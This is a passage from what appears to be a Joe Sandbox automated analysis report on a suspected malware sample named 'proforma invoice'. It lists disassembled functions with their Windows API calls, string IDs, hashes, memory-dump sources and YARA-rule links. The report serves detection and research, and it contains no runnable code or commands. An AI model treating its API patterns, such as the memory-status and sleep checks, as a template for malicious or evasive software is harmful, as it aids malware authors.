                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Connection_wcslen
                  • String ID: *$LPT
                  • API String ID: 1725874428-3443410124
                  • Opcode ID: 3228bc173c5bddeae4e0f1019208534d9df189a5731620489bf2ea137cc57415
                  • Instruction ID: 503c3641bef2ef37bca95aa7d9dfa8728f68a7dd51ecd9d51e3d53541dc50393
                  • Opcode Fuzzy Hash: 3228bc173c5bddeae4e0f1019208534d9df189a5731620489bf2ea137cc57415
                  • Instruction Fuzzy Hash: 05914E75A002049FCB14DF58C584EAABBF5EF49304F5980D9E40A9F3A2D735EE86CB91
                  Function 00ACE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                  Download Yara Rule
                  APIs
                  • __startOneArgErrorHandling.LIBCMT ref: 00ACE30D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorHandling__start
                  • String ID: pow
                  • API String ID: 3213639722-2276729525
                  • Opcode ID: 3f06c317d414488da217314f0576030eeae553fc8b653249f6797fd653a7a33b
                  • Instruction ID: 0951936a016ff3ccf52fb20f2fb460e6c6e25b35a06aeb124f0ed6375bbfb124
                  • Opcode Fuzzy Hash: 3f06c317d414488da217314f0576030eeae553fc8b653249f6797fd653a7a33b
                  • Instruction Fuzzy Hash: B6513A71A0C20296CB19F718CA42BBD3BA4AB40740F754D9EF0D7873A9FF358C959A46
                  Function 00ABE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: #
                  • API String ID: 0-1885708031
                  • Opcode ID: 9617db29867a8469b2247261e84b9df9aa36654287cd79d9e0fcd168ebeda9f5
                  • Instruction ID: 9a6222cd3d8cbfdeeee66695a2cdecff7aeae3941563a8362b014628a3fd1683
                  • Opcode Fuzzy Hash: 9617db29867a8469b2247261e84b9df9aa36654287cd79d9e0fcd168ebeda9f5
                  • Instruction Fuzzy Hash: BC51353550428ADFDF15EFA8C0816FA7BB8EF26310F244065F9919B2E1DB349D42CBA0
                  Function 00ABF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNEL32(00000000), ref: 00ABF2A2
                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00ABF2BB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: GlobalMemorySleepStatus
                  • String ID: @
                  • API String ID: 2783356886-2766056989
                  • Opcode ID: e48f51c1c8e83644c522e88857d93a400ff60e87cca254ac797d1bb7b4f92d1f
                  • Instruction ID: 7a44677deacfad1bf89c0fcebeefe454daa6035caae625874e02bcd1e6df3843
                  • Opcode Fuzzy Hash: e48f51c1c8e83644c522e88857d93a400ff60e87cca254ac797d1bb7b4f92d1f
                  • Instruction Fuzzy Hash: 355134714087449FE320AF14DD86BAFBBF8FB85710F81885DF199421A5EB708529CB66
                  Function 00B25745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                  Download Yara Rule
                  APIs
                  • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00B257E0
                  • _wcslen.LIBCMT ref: 00B257EC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: BuffCharUpper_wcslen
                  • String ID: CALLARGARRAY
                  • API String ID: 157775604-1150593374
                  • Opcode ID: 5dd954884d2911d6cb1a1486c7a9955e44477bdc53a43a9b76628efda09a1043
                  • Instruction ID: 375bc85d92a00d12b43923cf3bc1a1b419d27738e0c5035382be02ab5b261ed6
                  • Opcode Fuzzy Hash: 5dd954884d2911d6cb1a1486c7a9955e44477bdc53a43a9b76628efda09a1043
                  • Instruction Fuzzy Hash: BB41B331E001199FCB14DFA8D9819FEBBF9FF59320F1040A9E509AB291EB749D81CB90
                  Function 00B1D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 00B1D130
                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B1D13A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CrackInternet_wcslen
                  • String ID: |
                  • API String ID: 596671847-2343686810
                  • Opcode ID: b71c253b25b857e117a65a547f31953e55ba1bb17e11412346f0cc940e15b714
                  • Instruction ID: d76ca67f1c17f29550907ca2a8947d009a8d6640d7fc0ac1fa8d1a0c6ecd2d96
                  • Opcode Fuzzy Hash: b71c253b25b857e117a65a547f31953e55ba1bb17e11412346f0cc940e15b714
                  • Instruction Fuzzy Hash: ED312C72D00219ABCF15EFA4CD85AEEBFB9FF09340F500059F815B61A1DB35AA56CB50
                  Function 00B3356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                  Download Yara Rule
                  APIs
                  • DestroyWindow.USER32(?,?,?,?), ref: 00B33621
                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B3365C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$DestroyMove
                  • String ID: static
                  • API String ID: 2139405536-2160076837
                  • Opcode ID: 0540b6f336a5d2b6c5e60a5a5e3f68740c15bbc30a0a1e8d0af7eb49ad85786b
                  • Instruction ID: bf73af9397943c3af09fedb5a8c14771149a7f2ea8737ac7b016bdefaab204ea
                  • Opcode Fuzzy Hash: 0540b6f336a5d2b6c5e60a5a5e3f68740c15bbc30a0a1e8d0af7eb49ad85786b
                  • Instruction Fuzzy Hash: 93319E71110604AEDB109F68DC81EFB73E9FF98B20F219619F8A5D7290DB30AD91C760
                  Function 00B34537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B3461F
                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B34634
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID: '
                  • API String ID: 3850602802-1997036262
                  • Opcode ID: 220b115f6e9895c718e3357e5ac561c74430c4f732dbf91779dd0b6602392304
                  • Instruction ID: b44a47e0b78a1ccd07b497d0e4871f2626c4ffdcd7f151c0d10d7dba36af7889
                  • Opcode Fuzzy Hash: 220b115f6e9895c718e3357e5ac561c74430c4f732dbf91779dd0b6602392304
                  • Instruction Fuzzy Hash: 84312574A0020A9FDF14CFA9C981BDABBF5FF19300F2144AAE904AB381D770A941CF90
                  Function 00B331EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B3327C
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B33287
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID: Combobox
                  • API String ID: 3850602802-2096851135
                  • Opcode ID: 6b131e91a87b177d2ae4ab5194d9af040100fc31d7944fc69da634915dc3262d
                  • Instruction ID: ae116f3da42401ae605f9b6bf53252b0191ca3605b672505cbd35c291d707bdc
                  • Opcode Fuzzy Hash: 6b131e91a87b177d2ae4ab5194d9af040100fc31d7944fc69da634915dc3262d
                  • Instruction Fuzzy Hash: 7B11C8713002087FFF219F54DC81EBB37EAEB54764F204264F51897290D671DD518760
                  Function 00B33710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AA604C
                    • Part of subcall function 00AA600E: GetStockObject.GDI32(00000011), ref: 00AA6060
                    • Part of subcall function 00AA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA606A
                  • GetWindowRect.USER32(00000000,?), ref: 00B3377A
                  • GetSysColor.USER32(00000012), ref: 00B33794
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                  • String ID: static
                  • API String ID: 1983116058-2160076837
                  • Opcode ID: d7f797c82d9a16e65198638aaa90e84c02fa7c21abcc81520a674d8c9e67b3e9
                  • Instruction ID: 2ae8dc0e7bb6453815c0d6eb7027c02bac08b637a7eb02813ee0fe598d4e764b
                  • Opcode Fuzzy Hash: d7f797c82d9a16e65198638aaa90e84c02fa7c21abcc81520a674d8c9e67b3e9
                  • Instruction Fuzzy Hash: 9F1126B2610209AFDF00DFA8CC46EEA7BF8EB08714F114954F955E3250EB39E8619B60
                  Function 00B1CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                  Download Yara Rule
                  APIs
                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B1CD7D
                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B1CDA6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Internet$OpenOption
                  • String ID: <local>
                  • API String ID: 942729171-4266983199
                  • Opcode ID: b831366131b4f3542494ad7700b3a5f5c62020a808a7458020471f074fd8a930
                  • Instruction ID: d8f6ebe54d571403eb9c7e6ee8aefe5f77eb39008ecb18bf861fe9e18336c103
                  • Opcode Fuzzy Hash: b831366131b4f3542494ad7700b3a5f5c62020a808a7458020471f074fd8a930
                  • Instruction Fuzzy Hash: E2110671281631BAD7344B669C84EE7BEECEF127A4F9042B6B11993090D7709980D6F0
                  Function 00B33429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetWindowTextLengthW.USER32(00000000), ref: 00B334AB
                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B334BA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LengthMessageSendTextWindow
                  • String ID: edit
                  • API String ID: 2978978980-2167791130
                  • Opcode ID: 9da34ccaa1c854225daf13f4069869f775259d27ce15cdf60f501441d71b57a9
                  • Instruction ID: 3e4d8b5bf286bb0f17690089dcbacb80bbb67416f0c9995b220b520e5bf307a9
                  • Opcode Fuzzy Hash: 9da34ccaa1c854225daf13f4069869f775259d27ce15cdf60f501441d71b57a9
                  • Instruction Fuzzy Hash: 6F118F71100208ABEB124F64DC85AAB3BEAEB15B74F604764F965A72E0C771DC919B60
                  Function 00B06C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • CharUpperBuffW.USER32(?,?,?), ref: 00B06CB6
                  • _wcslen.LIBCMT ref: 00B06CC2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: STOP
                  • API String ID: 1256254125-2411985666
                  • Opcode ID: 4851bf9eafde6ff3944febc545d4c08d2c4c4ae5cbb104e3ec21b3b798743b4c
                  • Instruction ID: f4ecf05cea2b1c3766c23eab6a0d7470449604d4b8f27bbf92dcf7b736d7d2cf
                  • Opcode Fuzzy Hash: 4851bf9eafde6ff3944febc545d4c08d2c4c4ae5cbb104e3ec21b3b798743b4c
                  • Instruction Fuzzy Hash: FF01C032A0052A8BEB21AFBDDD819BF7BE5EA65710B100679E862971D0EB31D960C650
                  Function 00B01CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B01D4C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: ea344e70f27b04aeb3a59db5f2a92aaaeedab543bbb071d43f98bb70488bd0ba
                  • Instruction ID: e5ef1873a167699f0ca0865b3e132cd28558856ffcfcc16ce396a3bf8dd1b544
                  • Opcode Fuzzy Hash: ea344e70f27b04aeb3a59db5f2a92aaaeedab543bbb071d43f98bb70488bd0ba
                  • Instruction Fuzzy Hash: C201B571601218ABCB18EFA4CD558FF7BE8EB46350B140A99F822672D1EA3459088660
                  Function 00B01BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B01C46
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 0c1f140b84fc94ee3b7465bacb39f21cda3f68325d3b85f92be0f6627bd8074c
                  • Instruction ID: d38bdbdc74cca1e322ea372c2a2a0688551e608d7c55a85df07b8c39f2b9ea7f
                  • Opcode Fuzzy Hash: 0c1f140b84fc94ee3b7465bacb39f21cda3f68325d3b85f92be0f6627bd8074c
                  • Instruction Fuzzy Hash: 5B01F7716801086BDB28EB94CA529FF7BE8DB16340F140499B406772C1EE24DE4886B1
                  Function 00B01C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B01CC8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 0b381ff569c258b79d14af2ff7eaf2e45d118773b63c1323cb889c9e42f52997
                  • Instruction ID: ffd989195f0dac9a87e528556594b18fb59b74584fa5279a1ffaf539ebff1831
                  • Opcode Fuzzy Hash: 0b381ff569c258b79d14af2ff7eaf2e45d118773b63c1323cb889c9e42f52997
                  • Instruction Fuzzy Hash: 4701DB7164011867DB28EB94CB55AFF7BECDB12380F140455B801772C1EE24DF18C671
                  Function 00B01D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00B01DD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: f29b420e3b6582f1083228faf27010ab4d458d92c9deac2046e85e58af811090
                  • Instruction ID: 53c4985bd6329f27dcc578924fd1f3a936136342a5f3f97db317b14462ab300e
                  • Opcode Fuzzy Hash: f29b420e3b6582f1083228faf27010ab4d458d92c9deac2046e85e58af811090
                  • Instruction Fuzzy Hash: 9AF0F971A4161466D718EBA4CD92AFF7BECEB02350F040D95F422632C1DF6459088260
                  Function 00B2747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: 3, 3, 16, 1
                  • API String ID: 176396367-3042988571
                  • Opcode ID: 64314b9cc58334d9193530f0bea0d788aa0526c1d9b3f552f53439bc798498a6
                  • Instruction ID: ef47896783fac19fde9a2a6ec60e751b5d77d92f49251f8e146aaaa2c97f76d2
                  • Opcode Fuzzy Hash: 64314b9cc58334d9193530f0bea0d788aa0526c1d9b3f552f53439bc798498a6
                  • Instruction Fuzzy Hash: 78E02B066542301092313279BDC1EBF56C9CFC9750710186FF999C236AEEA48D9293AC
